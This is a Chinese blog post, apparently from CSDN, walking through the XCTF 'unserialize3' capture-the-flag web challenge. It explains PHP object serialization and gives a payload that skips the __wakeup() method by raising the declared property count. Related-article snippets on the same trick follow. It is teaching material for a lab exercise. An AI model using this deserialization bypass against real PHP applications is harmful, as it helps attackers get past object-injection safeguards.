攻防世界--Web进阶--unserialize3

最新推荐文章于 2024-07-17 16:17:24 发布
最新推荐文章于 2024-07-17 16:17:24 发布
阅读量131 收藏
点赞数
分类专栏: xctf攻防世界Web 文章标签: html5 html css
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2560088/article/details/120660379
版权

 xctf类不完整,少了一个大括号。

并且给了?code 提示我们用url进行对code进行赋值

我们可以利用code进行执行url输入。

题目是Unserialize提醒我们是反序列化。所以我们尝试输入序列化后的代码付给code看看会发生,什么。

用下面的网址进行运行php

demo_func_string_serialize 在线代码实例_w3cschool

<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$a=new xctf();
echo serialize($a)
?>

O:4:"xctf":1:{s:4:"flag";s:3:"111";}

 

 将序列化后的代码赋值给code(注意一定要对xctf类进行序列化,对我们自己定义的类进行序列胡化,后台在进行反序列化的时候会找不到类而无法识别)

因此我们得知code=是可以进行反序列化。

 在xctf类中,定义了魔法方法__wakeup(),在反序列化时调用会先调用__wakeup(),然后就运行了exit并输入bad request 。

因此要拿到flag。我们必须既要反序列化xctf类并且绕过wakeup方法。

__wakeup()函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行。因此,需要修改序列化字符串中的属性个数:

O:4:"xctf":3:{s:4:"flag";s:3:"111";}

 拿到flag

关于反序列化和反序列化漏洞参考

XCTF攻防世界web进阶练习_ 3_unserialize3_silence1_的博客-CSDN博客

 

Zhao蔫儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
chrome-unserialize-php-crx插件
04-02
语言:English 将php-serialized数据转换回用于人类可读的... 可以选择var_export或json ... 可以选择var_export或json 无法解决循环参考(如果真的需要,请在Github上提出问题) 谢谢: ... - 固定var_export库未引用对象键
typecho-1.1-15.5.12-beta.zip
03-17
3. 设计安全的程序架构,避免在敏感操作中使用反序列化。 4. 及时更新和打补丁,确保使用的是官方发布的最新安全版本。 对于Typecho用户而言,及时升级到最新版本是防范此漏洞的关键。官方可能已经修复了这一问题,...
攻防世界Web—unserialize3
weixin_45808483的博客
12-09 335
题目链接 https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1 启动环境 分析代码 代码定义了一个类,其中有一个方法 wakeup() , _wakeup()会直接退出,并输出" bad requests " 末尾有" ?code= " 看样子是要构造url来绕过wakeup()这个函数了。 当对一个对象序列化时,php就会调用sleep方法(如果存在的话
攻防世界-Web篇-005unserialize3】
gyy990526的博客
03-14 2771
解:打开靶机是一段php代码,最后问你?code=应该等于多少,看见_wakeup()就是典型的反序列化的题。 题目比较简单,只有一个xctf类,首先需要对其实例化,再用serialize行序列化输出字符串 : <?php class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } } $xctf=new xc
攻防世界-Web区-unserialize3
分享与记录
06-14 616
之前其实就记录过一篇反序列化的。PHP反序列化-(web_php_unserialize)那个反序列化的题目,比这个复杂一些。既然好久没练,而且在攻防世界上看到了这个 unserialize3 的题目,就复习一下反序列化吧。先 new 一个对象,然后将其序列化,代码如下: 序列化的结果如下: 表示序列化的对象中只有一个属性,如果待反序列化的字符串中,属性个数与实际不符合,则 失效。因此,将 改为 绕过 。传参结果如下:......
攻防世界-web-高手区-unserialize3
wyj_1216 House
07-10 885
题目 writeup class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } 分析上述代码,发现:_wakeup() 考虑反序列化 <?php class xctf{ public $flag = '111'; public function __wakeup(){ exi...
Python-php2go使用Golang实现PHP的常见内置函数
08-10
此外,还有一些其他功能,如`json_encode()`和`json_decode()`用于JSON数据的编码解码,`serialize()`和`unserialize()`用于序列化和反序列化对象,以及`sha1()`、`md5()`等哈希函数。 该项目的源代码可以在GitHub...
cpp-swooleserialize是目前php7中最快的序列化函数
08-15
`swoole_serialize`作为Swoole的一部分,其设计目标是提供比PHP内置的`serialize`和`unserialize`更快的序列化解决方案。 相较于传统的PHP序列化方法,`swoole_serialize`优化了内存管理和CPU计算,减少了不必要的...
HTML5 Input 验证身份证
cuisidong1997的博客
07-14 368
对于验证身份证号码,我们可以使用"type"属性为"text"的input元素,并通过"pattern"属性来指定验证的正则表达式。在许多网站或应用程序中,我们常常需要验证用户输入的身份证号码的有效性。本文将介绍如何使用HTML5的input元素来验证身份证号码,并提供相应的代码示例。通过使用HTML5的input元素和正则表达式,我们可以方便地验证用户输入的身份证号码的有效性。在本文中,我们介绍了身份证号码的正则表达式,并提供了相应的代码示例。身份证号码的格式包括18位和15位两种。
HTML5大作业三农有机,农产品,农庄,农旅网站源码
最新发布
xcLeigh
07-17 579
HTML5大作业三农有机,农产品,农庄,农旅网站源码,农旅文化相关介绍网站,农产品网站,农庄网站,介绍农业相关的网站,农业网站大作业,毕业设计,功能点包含轮播图,图文处理,表单,表格,菜单,模块等各种风格都有,代码上手简单,代码独立,可以直接使用。也可直接预览效果。
探索HTML5的设计原则:引领Web开发的未来方向
s8305057的博客
07-09 694
综上所述,HTML5的设计原则体现了对用户体验、内容可访问性、跨平台兼容性以及未来可扩展性的全面考量。这些原则不仅推动了Web技术的不断步,也为Web开发者提供了更加丰富和强大的工具集。随着HTML5技术的不断成熟和普及,我们有理由相信,Web应用将变得更加智能、高效和人性化,为用户带来前所未有的体验。作为Web开发者,我们应积极拥抱HTML5及其设计原则,不断探索和创新,共同推动Web技术的未来发展。
HTML2048小游戏(最新版)
w11111xxxl的博客
07-17 402
比上一篇文章的2048小游戏更好一点。
高频面试题-HTML
CSDN20221005的博客
07-15 903
离线存储是基于 .appcache ⽂件的缓存机制(不是存储技术)实现的,通过这个⽂件上的解析清单离线存储资源,这些资源就会像 cookie ⼀样被存储了下 来。块级元素有: div p 列表标签(ul ol li dl dt dd) 标题标签(h1 h2 h3 h4) 表格标签(table)空元素: <br> <hr> <img> <input> <link> <meta>->新增了语义化标签(header/footer/nav/asid)->新增了表单增强控件(data/time/email/url)
HTML-VUE页面调用android 客户端网络请求并返回数据
weixin_42504805的博客
07-15 198
确保WebView的设置允许JavaScript接口,并且WebView加载的页面有权限调用这些接口。这样,当用户在Vue页面中点击按钮时,会通过WebView调用Android客户端的网络请求方法,然后将结果回调到Vue页面中显示。在Html-- Vue页面调用Android客户端网络请求并返回数据,通常需要通过WebView与Android客户端的JavaScript接口行交互。2.在WebView中设置该接口。
JavaWeb---HTML
mmmmazhiyuan的博客
07-14 794
HTML是Hyper Text Markup Language的缩写。意思是超文本标记语言。它的作用是搭建网页结构,在网页上展示内容HTML5 是HyperText Markup Language 5 的缩写,HTML5技术结合了 HTML4.01 的相关标准并革新,符合现代网络发展要求,在 2008 年正式发布。HTML5 由不同的技术构成,其在互联网中得到了非常广泛的应用,提供更多增强网络应用的标准机。与传统的技术相比,HTML5 的语法特征更加明显,并且结合了SVG的内容。
HTML2048小游戏
w11111xxxl的博客
07-17 920
游戏控制方向四个按钮,我就不写样式了 源代码在效果图片后面 是可以正常玩的。
Html_Css问答集(8)
白话魔法师
07-16 812
html与css学习中的一些疑问,问答中轻松获取知识。
如何理解HTML语义化以及它的重要性体现在哪里
2402_84885073的博客
07-14 726
综上所述,HTML语义化对于提升网页的SEO、无障碍访问性、代码可读性可维护性、减少CSS和JavaScript依赖、支持多终端设备的浏览器渲染以及提高网站的专业性和可信度等方面都具有重要意义。因为通过合理的标签选择和结构安排,可以使得网页在没有或较少CSS和JavaScript的情况下也能够呈现出清晰的结构和基本的布局效果。HTML语义化是指使用具有明确含义的HTML标签来构建网页内容的过程,这些标签不仅描述了内容的结构,还传达了内容的含义。这有助于提高网页在搜索引擎中的排名,增加网页的曝光度和流量。
攻防世界ics-06
08-12
- *2* *3* [攻防世界Web “ics-06、unserialize3、supersqli”题解](https://blog.csdn.net/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值